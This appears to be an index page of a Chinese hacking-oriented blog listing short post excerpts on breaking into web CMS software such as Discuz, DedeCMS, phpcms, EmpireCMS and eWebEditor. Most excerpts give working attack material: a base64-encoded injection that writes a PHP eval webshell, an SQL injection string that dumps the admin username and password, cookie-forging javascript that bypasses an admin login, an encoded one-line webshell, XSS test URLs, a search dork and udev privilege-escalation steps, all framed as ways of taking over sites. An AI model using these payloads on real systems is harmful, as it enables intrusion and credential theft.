河北网络安全博客

河北博客是一个关注网络安全、网站设计、网站推广、网站优化SEO、网站建设的河北地方博客。


[置顶] 关于河北博客【想了解河北博客的朋友请看这里】

[置顶] 站长朋友请看这里【永久置顶】

DZ!2.5 后台拿 WebShell 方法 DZ!2.5 后台拿 shell(图)

buger

        1.注册任意账户2.登陆用户,发表blog日志(注意是日志)3.添加图片,选择网络图片,地址{${fputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}}  具体方法查看日志

河北博客:最新DEDECMS 漏洞0day 影响版本(dede5.5、dede5.6)

buger

影响版本:dedecms5.5-5.6
官方网站:http://www.dedecms.com
漏洞类型:设计错误
漏洞代码:member\index_do.php

z-blog 1.8 最新跨站XSS漏洞及修复方法

buger

漏洞文件:cmd.asp

新网被指存漏洞导致域名被盗 用户称考虑索赔

buger

11月17日消息,今日有域名界人士向TechWeb反映,众多在新网注册的CN域名被盗,包括51.cn、61.cn、168.cn、188.cn等极具价值的域名。域名界人士认为,被盗原因很可能是新网系统存在重大漏洞。

phpcms2008 sp3注入漏洞

buger

phpcms最新版注入漏洞 注入yp/company.php?where=%23
进入后台访问
http://www.jzq8.com/admin.php?mod=phpcms&file=safe&action=see_code&files=kindle.php

ECShop 2.7.2 最新任意用户登陆漏洞0day

buger

     ECShop 2.7.2正式版的源代码, 且低级漏洞。这个漏洞可以让任何人以任何用户身份登录到ECShop前台! 漏洞的影响 ECShop 2.7.2,ECShop 2.7.1 不受影响 漏洞的出现 漏洞出现在/include/init.php文件的512行左右, 代码如下

phpcms2008 yp.php 注入利用 Xday EXP

buger

测试方法: 保存以下代码为phpcms2008.php。安装php,进入php目录。执行php php2008.php localhost /yq 本地测试成功。

瑞星防火墙监测出华军软件园被挂马(附图)

buger

      被挂马页面1:http://www.onlinedown.net/soft/3011.htm  被挂马页面2:http://www.onlinedown.net/softdown/3011_2.htm  不知道这次是华军真的被挂马呢还是误报

游九(U9)网DOTA专题站搜索页跨站漏洞

buger

代码如下,括号任意内容
http://dota.uuu9.com/Search.aspx?keyword=<script>alert("http://www.kingwq.cn")</script>

UCHOME1.5 XSS漏洞

buger

测试代码: 需要先登入会员
http://u.discuz.net//home//space.php?<script>alert(/hiphop/)</script></script>

MSN Editor 漏洞

buger

这个编辑器相当的简陋,下午拿站的时候碰到了一个,没有数据库备份,也没有什么可以直接上传webshell的地方,简陋到只有一个editor的界面。简单说下利用的方法吧。

新云4.0最新0day

buger

访问ask目录,注册用户,
在密码问题的地方插入加密后的一句话:┼攠數畣整爠煥敵瑳∨≡┩愾
注册成功后连接默认数据库:ask/data/ask_newasp.asa 密码:a

ewebeditor后台通杀漏洞

buger

今天看了下ewebeditor php的版本,记得以前看了php版,那个版本比较低,连后台都没
今天下了个3.8的,竟然找出一点令人兴奋的东西出来…
php版本后台是调用../ewebeditor/admin/config.php,大家去看下源码就知道
利用方法:首先当然要找到登陆后台,默认是../eWebEditor/admin/login.php,进入后台后随便输入一个用户和密码,当然会提示出错了.
这时候你清空浏览器的url,然后输入 javascript:alert(document.cookie=”adminuser=”+escape(”admin”)); javascript:alert(document.cookie=”adminpass=”+escape(”admin”)); javascript:alert(document.cookie=”admindj=”+escape(”1″));后三次回车,清空浏览器的 url,大家注意了,这次输入的url要注意,我们这次要输入的文件都是在正常情况下经过验证才能浏览的文件如../ewebeditor/admin /default.php
...

3389端口无法登录的5种原因

windows

        1、服务器在内网。
  2、做了tcp/ip筛选。
  先执行下面cmd命令:
  cmd /c regedit -e c:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip,导出注册表里关于TCP/IP筛选的第一处
  cmd /c regedit -e c:\2.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip,导出注册表里关于TCP/IP筛选的第二处
...

帝国CMS系统注入漏洞

buger

GG关键字:inurl:e/tool/gbook/?bid=1
主要填写您的姓名和联系邮箱这两处,其它的随便填。
您的姓名:縗\
联系邮箱:,1,1,1,(select concat(username,0x5f,password,0x5f,rnd) from phome_enewsuser where userid=1),1,1,1,0,0,0)/*
然后进行提交返回页面即爆出用户名密码。

又一个免费电话!

download

http://www.alicall.com/freevoip.htm

正在搞活动 注册给6-100分钟的电话时间

Z-BLOG XSS Vulnerabilities漏洞

buger

漏洞描述:
Z-BLOG后台登陆错误信息显示文件c_error.asp,虽然对跳转URL的参数sourceurl进行了编码,但没有判断链接头部,执行了javascript伪协议,造成跨站脚本漏洞。
漏洞测试:

http://www.xxx.com/function/c_error.asp?errorid=7&number=0&description=&source=&sourceurl=javascript:alert(document.cookie)
...

PHP万能密码

buger

神秘小强&1943
说实话如果一个网站的前台都是注入漏洞,那么凭经验,万能密码进后台的几率基本上是

百分之百。

     可是有的人说对PHP的站如果是GPC魔术转换开启,就会对特殊符号转义,就彻底杜绝了

PHP注入。

     其实说这话的人没有好好想过,更没有尝试过用万能密码进PHP的后台。

     其实GPC魔术转换是否开启对用万能密码进后台一点影响也没有。

...

php+mysql如何爆页面绝对路径

buger

1、加引号’这个最常用 


2、变参数类型,比如把id=1改为id=a等 有时很有效果 


3、乱添数据,比如把id=1改为id=1111111111111111111111......等 有时很有效果 


4、text.php?aa[]=xx 


5、利用php的max_execution_time, 能将绝对路径显示出来. 这机率非常小.适合在服务器负荷严重的时候测试. 

...

UDEV本地溢出漏洞利用手记

buger

来源:职业欠钱
  这段时间UDEV溢出漏洞很火,在虚拟机上做了下试验,发现确实很好用。
貌似通杀范围很广

1. 将http://www.milw0rm.com/exploits/8478 保存为一个shell文件,也可以随便命名,例如我后面命名为a

2. 查找udev的第一个socket的PID,可以通过执行如下命令获得:
   cat /proc/net/netlink

3. 将出现在第一行的PID减去1,作为参数,例如
...

微软爆严重漏洞 网民在线看电影可能中毒

buger

微软公司近日发布安全建议证实,WindowsXP等操作系统存在一个“DirectShow视频开发包”漏洞。一旦该0day漏洞被黑客利用,当网民在线观看经黑客恶意构造的视频文件时,电脑将自动下载和运行木马程序。

DirectShow是微软公司推出的新一代基于网络流媒体处理的开发包,广泛支持Asf、Mpeg、Avi、Dv、Mp3、Wave等各种媒体格式。此次爆出的漏洞是一个动态链接库文件在使用滤镜进行“着色”时产生的,当用户在线观看恶意视频文件时,Realplayer、暴风影音、qq影音、WindowsMediaPlayer、Quicktime等主流播放器都会触发该漏洞,从而使自己的网游、网银面临被盗风险。除WindowsVista及Window7用户外,WindowsXP、Windows2000及Windows2003操作系统的用户均会受这一漏洞的影响。目前,微软公司已在其官方网站发布安全建议,而正式补丁预计将在未来两个月内面向全球Windows用户同时发布。

...
分页:1[2][3][4]

订阅河北博客

  • 订阅我的博客:订阅我的博客
  • 关注新浪微博:关注新浪微博
  • 关注腾讯微博:关注腾讯微博
  • google reader
  • 鲜果
  • 抓虾
  • QQ邮箱

河北博客站内搜索

河北博客相关链接

河北博客热文排行

Powered By kingwq's blog

本站采用创作共用版权协议, 要求署名、非商业用途和保持一致. 转载本站内容必须也遵循“署名-非商业用途-保持一致”的创作共用协议.
This site is licensed under a Creative Commons Attribution-NonCommercial-ShareAlike 2.5 License.冀ICP备09002514号.Copyright www.kingwq.cn.2010